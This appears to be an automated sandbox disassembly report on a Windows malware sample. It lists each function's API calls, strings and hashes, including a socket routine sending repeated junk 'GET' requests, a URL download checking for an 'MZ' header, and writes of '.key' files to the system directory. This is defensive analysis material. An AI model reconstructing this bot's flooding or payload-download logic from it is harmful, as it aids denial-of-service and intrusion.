                                • API String ID: 3312516386-0
                                • Opcode ID: d3448f76e52faa917ff72099c3d4ae32099888250af06bce9c62b5df9f15304b
                                • Instruction ID: f53181e0cb89491cd7c99ff78531d68b368b4d0a2bb5ae7883e750d4989dc1ff
                                • Opcode Fuzzy Hash: d3448f76e52faa917ff72099c3d4ae32099888250af06bce9c62b5df9f15304b
                                • Instruction Fuzzy Hash: 82214DB62107519FE620DB71CC88967B3BEFF8C350B014A09E69247755EB75FC458B60
                                APIs
                                • GetModuleHandleA.KERNEL32(00000000), ref: 10002827
                                • LoadIconA.USER32 ref: 1000285E
                                • LoadCursorA.USER32(00000000,00007F00), ref: 1000286F
                                • RegisterClassExA.USER32(?), ref: 1000288E
                                • CreateWindowExA.USER32(00000000,1007A204,1007A204,00CF0000,000000DF,000000DF,000000DF,000000DF,00000000,00000000,00000000,00000000), ref: 100028B4
                                • ShowWindow.USER32(00000000,00000005), ref: 100028C3
                                • UpdateWindow.USER32(00000000), ref: 100028CA
                                • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 100028E1
                                • TranslateMessage.USER32(00007F05), ref: 100028F9
                                • DispatchMessageA.USER32(00007F05), ref: 10002900
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1000290D
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Window$Load$ClassCreateCursorDispatchHandleIconModuleRegisterShowTranslateUpdate
                                • String ID: 0
                                • API String ID: 2442869364-4108050209
                                • Opcode ID: ffe4e2d3166741ce70057db877a5010deb8e940f0538d27bc5693e2a0d76c847
                                • Instruction ID: 49f6c6a48927359fcf1092dd417bf73ba722ddb4962998ae2525dee049488c6b
                                • Opcode Fuzzy Hash: ffe4e2d3166741ce70057db877a5010deb8e940f0538d27bc5693e2a0d76c847
                                • Instruction Fuzzy Hash: C121B5715483607FF310DB688C49F4B7BA4EB85B60F104A19F744AB3C4EBB59A00CB96
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: wsprintf$Version
                                • String ID: Windows 2000$Windows 2003$Windows NT$Windows Windows7/Vista/2008$Windows XP
                                • API String ID: 514958720-574678973
                                • Opcode ID: c538841ac387e5c01469a887863cc8ff63225bb54d14823df1dd693bf34828af
                                • Instruction ID: 24eada89e271c6f03dafd311d52a79426f13bcc6e3bcc886577ca1c3c34736ac
                                • Opcode Fuzzy Hash: c538841ac387e5c01469a887863cc8ff63225bb54d14823df1dd693bf34828af
                                • Instruction Fuzzy Hash: D5118230900796ABF610CB58DCA4B8A77D0EB43295FD1C519F6C992310D738A994CB5B
                                APIs
                                • ReleaseDC.USER32(?,?), ref: 1000FEB8
                                • DeleteDC.GDI32(?), ref: 1000FEC8
                                • DeleteDC.GDI32(?), ref: 1000FECE
                                • DeleteDC.GDI32(?), ref: 1000FED4
                                • DeleteDC.GDI32(?), ref: 1000FEDD
                                • DeleteObject.GDI32(?), ref: 1000FEE9
                                • DeleteObject.GDI32(?), ref: 1000FEEF
                                • DeleteObject.GDI32(?), ref: 1000FEF8
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,1006A14E,000000FF,1000FE68), ref: 1000FF02
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,1006A14E,000000FF,1000FE68), ref: 1000FF0E
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A14E,000000FF,1000FE68), ref: 1000FF17
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,1006A14E,000000FF,1000FE68), ref: 1000FF20
                                • DestroyCursor.USER32(00000000), ref: 1000FF46
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Delete$??3@$Object$CursorDestroyRelease
                                • String ID:
                                • API String ID: 2735177900-0
                                • Opcode ID: 6d97574774b83c00f42543f7479bee7085eb61e582d7fdda2d66cd1cb8b7d107
                                • Instruction ID: e788815f10d6092d27ca2afd98025b986ca8f6d31416693049e9cb6994815525
                                • Opcode Fuzzy Hash: 6d97574774b83c00f42543f7479bee7085eb61e582d7fdda2d66cd1cb8b7d107
                                • Instruction Fuzzy Hash: C121FAB6500B509BE324DB69CC80A67F3EDFF89610F154E1DF69683750DAB9F8448B60
                                APIs
                                  • Part of subcall function 10006830: GetSystemDirectoryA.KERNEL32(?,00000100), ref: 10006843
                                  • Part of subcall function 10006830: sprintf.MSVCRT ref: 1000688E
                                • RtlExitUserThread.NTDLL(00000000), ref: 10006A49
                                  • Part of subcall function 100040D0: GetTickCount.KERNEL32 ref: 100040D1
                                  • Part of subcall function 100040D0: rand.MSVCRT ref: 100040D9
                                • sprintf.MSVCRT ref: 100069AF
                                  • Part of subcall function 100067F0: GetInputState.USER32 ref: 100067F3
                                  • Part of subcall function 100067F0: GetCurrentThreadId.KERNEL32 ref: 100067FF
                                  • Part of subcall function 100067F0: PostThreadMessageA.USER32(00000000), ref: 10006806
                                  • Part of subcall function 100067F0: GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 10006817
                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 100069D9
                                • Sleep.KERNEL32(00000064), ref: 100069DD
                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 100069FF
                                • Sleep.KERNEL32(00000064), ref: 10006A03
                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 10006A25
                                • Sleep.KERNEL32(000003E8), ref: 10006A2C
                                • TerminateProcess.KERNEL32(?,00000000), ref: 10006A35
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CreateSleepThread$Messagesprintf$CountCurrentDirectoryExitInputPostStateSystemTerminateTickUserrand
                                • String ID: "%s" "%s?abc=%d%d%d%d"$D
                                • API String ID: 172844161-298079244
                                • Opcode ID: 996b448a330ea39742fb996c5da3b8e9d5bac2eccd2bcf86842a313de783662b
                                • Instruction ID: dee45d619fc2e394e3d2b66f1065b8d82e3a70ab678904dd2a9156dbc98c66a4
                                • Opcode Fuzzy Hash: 996b448a330ea39742fb996c5da3b8e9d5bac2eccd2bcf86842a313de783662b
                                • Instruction Fuzzy Hash: C44185B26043856EF710D754CC41FB777A9FBC4704F100929F7899A281DAB5A9098B63
                                APIs
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100097B4
                                  • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                  • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                  • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                  • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                  • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 1000986B
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 1000987E
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 10009892
                                • lstrlen.KERNEL32(?), ref: 100098A0
                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 100098A9
                                • lstrlen.KERNEL32(?,?,00000000), ref: 100098CF
                                • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 100098D8
                                • CloseHandle.KERNEL32(00000000), ref: 100098DF
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Resource$??2@lstrlen$??3@CloseCreateDirectoryFindHandleLoadLockPointerSizeSystemWrite
                                • String ID: .key$XXXXXX
                                • API String ID: 3558955628-2601115946
                                • Opcode ID: d24516f02ea8cd83adf64a079234290d1210b910ff9b8bcf6310260086aca102
                                • Instruction ID: d999d40ade01bfd780963a7e4da00662e15d7ecd24b9ce1fec2d34a8ea1a0eed
                                • Opcode Fuzzy Hash: d24516f02ea8cd83adf64a079234290d1210b910ff9b8bcf6310260086aca102
                                • Instruction Fuzzy Hash: E0313B722406441BE728DA749C9AB6B368BEBC5371F14072DFA67872D1DEE49D098350
                                APIs
                                • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 1000D50E
                                • GetProcAddress.KERNEL32(00000000,closesocket), ref: 1000D51E
                                • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 1000D57A
                                • GetProcAddress.KERNEL32(00000000,send), ref: 1000D586
                                • GetLastError.KERNEL32(?,?,00000000), ref: 1000D5BA
                                • CloseHandle.KERNEL32(00000000), ref: 1000D5FB
                                • Sleep.KERNEL32(00000002), ref: 1000D611
                                • FreeLibrary.KERNEL32(?), ref: 1000D628
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Library$AddressLoadProc$CloseErrorFreeHandleLastSleep
                                • String ID: closesocket$send$ws2_32.dll
                                • API String ID: 2554972651-2162363962
                                • Opcode ID: 7ecabd3abaaee7e7d6219c6ba1515479c9e7988b56b45e660df247fc14e0e3a4
                                • Instruction ID: 67dba68df69635aebfa3a3596635123a731ded8294c22980d7a7e8a666a99e77
                                • Opcode Fuzzy Hash: 7ecabd3abaaee7e7d6219c6ba1515479c9e7988b56b45e660df247fc14e0e3a4
                                • Instruction Fuzzy Hash: 6031E330104751ABF604EF68CC84B6F77E9FF89795F010A1AFA49D7185CB71E8008B61
                                APIs
                                • WSAStartup.WS2_32(00000202,?), ref: 10004144
                                • htons.WS2_32 ref: 1000416B
                                • inet_addr.WS2_32(1007DD2C), ref: 1000417B
                                • socket.WS2_32(00000002,00000001,00000000), ref: 1000419A
                                • connect.WS2_32(00000000,?,00000010), ref: 100041AA
                                • send.WS2_32(00000000,GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#,?,00000000), ref: 100041CF
                                • Sleep.KERNEL32(00000032,?,00000000), ref: 100041D8
                                • closesocket.WS2_32(00000000), ref: 100041E5
                                • RtlExitUserThread.NTDLL(00000000), ref: 100041F6
                                • closesocket.WS2_32 ref: 100041FD
                                Strings
                                • GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#, xrefs: 100041B7, 100041C9
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: closesocket$ExitSleepStartupThreadUserconnecthtonsinet_addrsendsocket
                                • String ID: GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#
                                • API String ID: 4272391932-4039768343
                                • Opcode ID: 68e5b576acd18c2c4b14ef7e3e27ec556b121b0e629d7d28d9c654a0c05f4b01
                                • Instruction ID: 045f70dc197dd2c2e97778d2da9c7e2bc6c5d128113408fc6fa20a61d9539879
                                • Opcode Fuzzy Hash: 68e5b576acd18c2c4b14ef7e3e27ec556b121b0e629d7d28d9c654a0c05f4b01
                                • Instruction Fuzzy Hash: 802129711053A05BF300DF34CC89BAA3BA9FF45750F10062DF5A6D61E1EBB49D49876A
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000C549
                                • ??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000), ref: 1000C559
                                • Process32First.KERNEL32(00000000,00000000), ref: 1000C56B
                                • GetLastError.KERNEL32(00000000,00000000), ref: 1000C574
                                • _strupr.MSVCRT ref: 1000C58D
                                • _strupr.MSVCRT ref: 1000C594
                                • strstr.MSVCRT ref: 1000C59A
                                • Process32Next.KERNEL32(?,00000000), ref: 1000C5B8
                                • _strupr.MSVCRT ref: 1000C5C2
                                • _strupr.MSVCRT ref: 1000C5C9
                                • strstr.MSVCRT ref: 1000C5CF
                                • Process32Next.KERNEL32(?,00000000), ref: 1000C5E2
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: _strupr$Process32$Nextstrstr$??2@CreateErrorFirstLastSnapshotToolhelp32
                                • String ID:
                                • API String ID: 3005159451-0
                                • Opcode ID: 23efa30b1931372c08988a04184d169330586e24b49372f407ec6eb3898f93af
                                • Instruction ID: c0712735c5d1058a8d10a1fcff2c42ee7888384913c1c0693e55bcc166550335
                                • Opcode Fuzzy Hash: 23efa30b1931372c08988a04184d169330586e24b49372f407ec6eb3898f93af
                                • Instruction Fuzzy Hash: 5D1106B69003552BF600D735AC85E9B7B9CDF803E6F04143AFD06D6201FA21FE5486B6
                                APIs
                                • LCMapStringW.KERNEL32(00000000,00000100,0040642C,00000001,00000000,00000000,00000103,00000001,00000000,?,0040446F,00200020,00000000,?,00000000,00000000), ref: 00404FC1
                                • LCMapStringA.KERNEL32(00000000,00000100,00406428,00000001,00000000,00000000,?,0040446F,00200020,00000000,?,00000000,00000000,00000001), ref: 00404FDD
                                • LCMapStringA.KERNEL32(?,?,?,?,oD@ ,?,00000103,00000001,00000000,?,0040446F,00200020,00000000,?,00000000,00000000), ref: 00405026
                                • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,0040446F,00200020,00000000,?,00000000,00000000), ref: 0040505E
                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 004050B6
                                • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 004050CC
                                • LCMapStringW.KERNEL32(?,?,?,00000000,oD@ ,?,?,0040446F,00200020,00000000,?,00000000), ref: 004050FF
                                • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 00405167
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: String$ByteCharMultiWide
                                • String ID: oD@
                                • API String ID: 352835431-4270158488
                                • Opcode ID: 2afe8f83c1e32ad7c20cd3ef5f0d9ce625311a17c994b0e660629879fca01b21
                                • Instruction ID: cd81302389fada6b5ad7ddbf8cce1e057f1d7051e18c97d2a0019bd6d71d522c
                                • Opcode Fuzzy Hash: 2afe8f83c1e32ad7c20cd3ef5f0d9ce625311a17c994b0e660629879fca01b21
                                • Instruction Fuzzy Hash: 04517B31900619EBCF228F94DD45AAF7FB9EB48750F10413AF915B52A0D37A8D21DFA8
                                APIs
                                • InternetOpenA.WININET(Mozilla/4.0 (compatible),00000000,00000000,00000000,00000000), ref: 10012B86
                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 10012BB4
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: InternetOpen
                                • String ID: MZ$Mozilla/4.0 (compatible)
                                • API String ID: 2038078732-1122958964
                                • Opcode ID: 1b603d2b6cb4bb4a2b0791728ef789fd7c844eea8b35218b3130136ed5bb0548
                                • Instruction ID: 8c63eb6a41a225431111a82eac4f27fd10ac0d63006a227f2e92e921feb65f24
                                • Opcode Fuzzy Hash: 1b603d2b6cb4bb4a2b0791728ef789fd7c844eea8b35218b3130136ed5bb0548
                                • Instruction Fuzzy Hash: 3C31F5B1204359ABD210DF25DC80E9FBBEDFBC97A4F01092DF64097140D775E94987A6
                                APIs
                                • GetVersionExA.KERNEL32(?), ref: 0040164A
                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 00401698
                                • wsprintfA.USER32 ref: 004016CA
                                • GetFileAttributesA.KERNEL32(?), ref: 004016E6
                                • ExitProcess.KERNEL32 ref: 004016F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: AttributesDirectoryExitFileProcessVersionWindowswsprintf
                                • String ID: %s\SysTEM32\sysedit.exe$H$o$s$t
                                • API String ID: 2470598139-87740868
                                • Opcode ID: 251448df7b50cf4df5bb98e08941e18823b330a20de11f881ffddb0b690df73d
                                • Instruction ID: 47bd58147c64a949f084ac4d6b8b2736ebceef07ebb8f42e32fac6c8f9cf200e
                                • Opcode Fuzzy Hash: 251448df7b50cf4df5bb98e08941e18823b330a20de11f881ffddb0b690df73d
                                • Instruction Fuzzy Hash: 02210830E00248BFDB10C768DC087CEBBB96F46304F0044E9E28AB22D1DBB45B88CA57
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CharNext$free$AttributesCreateDirectoryErrorFileLastlstrcpylstrlenmalloc
                                • String ID:
                                • API String ID: 3289936468-0
                                • Opcode ID: 91c087a2b93d1311ec0e6759ce73b84a9ff3fbed6c289464c935a959dac4fcdd
                                • Instruction ID: 2210af07b0f8d49035197b9e4786ebf24fa4771591eb8ab4f4da9f9fb379daaa
                                • Opcode Fuzzy Hash: 91c087a2b93d1311ec0e6759ce73b84a9ff3fbed6c289464c935a959dac4fcdd
                                • Instruction Fuzzy Hash: E341C571C047A59FF7A1CF188C447AABBE9FB067E0F10016AD9E193244D3741A4ADBA1
                                APIs
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000CF72
                                  • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                  • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                  • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                  • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                  • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 1000D029
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 1000D038
                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 1000D041
                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 1000D054
                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000), ref: 1000D07C
                                • CloseHandle.KERNEL32(00000000), ref: 1000D085
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileResource$??2@??3@$CloseCreateDirectoryFindHandleLoadLockReadSizeSystem
                                • String ID: .key$XXXXXX
                                • API String ID: 710762369-2601115946
                                • Opcode ID: f060dc9d51e19fff5d6fe7fdc321299b3120c7788261040069954f175d4ea1c6
                                • Instruction ID: 0c7bdf6f6cfedffafb096b417f82647280419507c62535d74d6fa5ee32727597
